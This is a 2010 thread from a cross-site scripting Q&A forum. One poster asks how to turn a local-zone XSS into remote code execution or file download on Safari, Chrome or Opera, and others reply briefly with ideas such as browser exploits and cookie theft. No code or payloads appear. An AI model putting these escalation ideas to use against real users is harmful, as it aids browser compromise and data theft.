Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
more power!
Posted by: ganger
Date: May 28, 2010 03:30PM

Hi,
i was reading around the web about vulnerabilities like the Universal PDF XSS (linked below)

http://www.gnucitizen.org/blog/universal-pdf-xss-after-party/

and i was thinking how to use this kind of vuln (where an attacker is able to execute arbitrary javascript code in a security zone different from the internet security zone) to do more.

I already know that with a simple XMLHttpRequest i'm able to upload files to a remote server and i already know that if the victim is using IE i can use vbscript/activex to obtain remote code execution.

But what can i do if the victim browser is Safari/Chrome/Opera to obtain remote code execution/download arbitrary files to the victim pc???

Options: ReplyQuote
Re: more power!
Posted by: Skyphire
Date: May 28, 2010 04:10PM

PDF is joke, unless they haven't turned of Javascript in PDF, it's almost too easy. I don't even bother to look into PDF exploits, it's like launching Java applets; no brains involved. You don't even need an exploit, just ask permission to launch it. That's it.

Options: ReplyQuote
Re: more power!
Posted by: ganger
Date: May 28, 2010 04:34PM

mmm... but my question was another one: i linked the pdf vulnerability just as an example.

Options: ReplyQuote
Re: more power!
Posted by: SW
Date: May 29, 2010 05:39AM

You must find an exploit of the browser for that which would be quite serious, XSS is just for javascripting and usually not very useful.

Options: ReplyQuote
Re: more power!
Posted by: thornmaker
Date: May 29, 2010 11:21AM

/facepalm

Options: ReplyQuote
Re: more power!
Posted by: ganger
Date: May 30, 2010 12:40PM

Let's assume that i found a vulnerability that allow an attacker to execute arbitrary javascript code in the local security zone of a web browser. If this vulnerability was found inside Internet Explorer i can use Activex/vbscript to obtain code execution/download arbitrary files. But what i can do if this kind of vulnerability is found in a browser like Mozilla Firefox/Google Chrome/Safari/Opera?

I know that is possible to use XMLHttpRequest to upload arbitrary files to a remote server but what else?

Options: ReplyQuote
Re: more power!
Posted by: Neo139
Date: May 30, 2010 02:22PM

stuff on the website itselft. Like get his cookie or post forms without captcha.

Options: ReplyQuote


Sorry, only registered users may post in this forum.